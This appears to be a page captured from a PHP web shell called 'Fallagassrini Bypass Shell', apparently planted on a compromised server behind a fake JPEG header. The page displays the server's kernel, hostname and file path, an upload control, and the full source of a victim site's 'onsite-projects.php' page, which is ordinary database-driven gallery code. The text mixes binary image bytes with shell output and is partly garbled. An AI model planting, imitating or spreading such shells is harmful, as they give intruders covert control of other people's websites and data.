JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/designcr/public_html/

Linux server.meentosys.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Upload File :
Current File : /home/designcr/public_html/onsite-projects.php

<?php
 include 'new_con.php';
$cnd900 = "status = '2' && id = '38'";
$check900 = $sqlfun->fetchdata("content",$cnd900);
$row900 = $check900->fetch(PDO::FETCH_OBJ);
?>
<title><?=$row900->p_title?></title>
<meta name="description" content="<?=$row900->p_description?>" />
<meta name="keywords" content="<?=$row900->p_keywords?>" /> 
<?php
include 'header.php';
?>
<?php 
  if($row900->logo1) { 
     ?>
     <img  class="margin-top" src="content_big/<?=$row900->logo1?>" class="img-responsive" />    
    <?php
      
  } 
?> 
          
<?php
   $cnd89 = "status='2' order by id desc";
   $check89 = $sqlfun->fetchdata("docu",$cnd89);
   if($check89->rowCount()){
?>
      <section id="section-about">
                <div class="container">
                    <div class="row">
                        <div class="col-md-6 offset-md-3 text-center wow fadeInUp">
                            <h1>Onsite Project</h1>
                            <div class="separator"><span><i class="fa fa-circle"></i></span></div>
                            <div class="spacer-single"></div>
                        </div>
 <?php
            
              $iii=0;   
            while($row89 = $check89->fetch(PDO::FETCH_OBJ))
            {
              $iii++;  
            if($iii==1){ ?><div class="col-md-4 wow fadeInLeft"><?php }    
            else if($iii==2){ ?>   <div class="col-md-4 wow fadeInUp" data-wow-delay=".2s"><?php }    
            else{ ?> <div class="col-md-4 wow fadeInRight"><?php }    
                ?>
                <div class="boxs ">
                         <a class="without-caption image-link" href="img/<?=$row89->image?>">
            <h3 class="text-center boxs_h3"><span class="id-color"><?=$row89->heading;?></span> </h3>
                <img src="img/<?=$row89->image?>" style="max-height:450px;" class="img-responsive" alt="<?=$row89->heading;?>">
                         </a>
                </div>
                
                </div>
            <?php 
                }
                if($iii==3){$iii=0;}
             
            ?>
            </div>
              
        </div>
    </section>
     
<?php   }   
   $cnd89 = "status='2' order by id desc";
   $check89 = $sqlfun->fetchdata("videoc",$cnd89);
   if($check89->rowCount()){
         
?>
      <section id="section-about">
                <div class="container">
                    <div class="row">
 <?php
            
              $iii=0;   
            while($row89 = $check89->fetch(PDO::FETCH_OBJ))
            {
              $iii++;  
            if($iii==1){ ?><div class="col-md-4 wow fadeInLeft"><?php }    
            else if($iii==2){ ?>   <div class="col-md-4 wow fadeInUp" data-wow-delay=".2s"><?php }    
            else{ ?> <div class="col-md-4 wow fadeInRight"><?php }    
                ?>
                <div class="boxs ">
                    <iframe style="width: 100%; height: 350px;" src="https://www.youtube.com/embed/<?=$row89->heading;?>" frameborder="0" allow="autoplay; encrypted-media" allowfullscreen></iframe>
                        
                </div>
                
                </div>
            <?php 
                }
                if($iii==3){$iii=0;}
             
            ?>
            </div>
              
        </div>
    </section>
     
<?php   }   ?>
<?php include 'footer.php'; ?>
     <style>
         .image-link {
  cursor: -webkit-zoom-in;
  cursor: -moz-zoom-in;
  cursor: zoom-in;
}


/* This block of CSS adds opacity transition to background */
.mfp-with-zoom .mfp-container,
.mfp-with-zoom.mfp-bg {
	opacity: 0;
	-webkit-backface-visibility: hidden;
	-webkit-transition: all 0.3s ease-out; 
	-moz-transition: all 0.3s ease-out; 
	-o-transition: all 0.3s ease-out; 
	transition: all 0.3s ease-out;
}

.mfp-with-zoom.mfp-ready .mfp-container {
		opacity: 1;
}
.mfp-with-zoom.mfp-ready.mfp-bg {
		opacity: 0.8;
}

.mfp-with-zoom.mfp-removing .mfp-container, 
.mfp-with-zoom.mfp-removing.mfp-bg {
	opacity: 0;
}



/* padding-bottom and top for image */
.mfp-no-margins img.mfp-img {
	padding: 0;
}
/* position of shadow behind the image */
.mfp-no-margins .mfp-figure:after {
	top: 0;
	bottom: 0;
}
/* padding for main container */
.mfp-no-margins .mfp-container {
	padding: 0;
}



/* aligns caption to center */
.mfp-title {
  text-align: center;
  padding: 6px 0;
}
.image-source-link {
  color: #DDD;
}


body { -webkit-backface-visibility: hidden; padding: 10px 30px; 
  font-family: "Calibri", "Trebuchet MS", "Helvetica", sans-serif;
}
         
     </style>
     <script>
     $('.without-caption').magnificPopup({
		type: 'image',
		closeOnContentClick: true,
		closeBtnInside: false,
		mainClass: 'mfp-no-margins mfp-with-zoom', // class to remove default margin from left and right side
		image: {
			verticalFit: true
		},
		zoom: {
			enabled: true,
			duration: 300 // don't foget to change the duration also in CSS
		}
	});

$('.with-caption').magnificPopup({
		type: 'image',
		closeOnContentClick: true,
		closeBtnInside: false,
		mainClass: 'mfp-with-zoom mfp-img-mobile',
		image: {
			verticalFit: true,
			titleSrc: function(item) {
				return item.el.attr('title') + ' &middot; <a class="image-source-link" href="'+item.el.attr('data-source')+'" target="_blank">image source</a>';
			}
		},
		zoom: {
			enabled: true
		}
	});


     </script>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net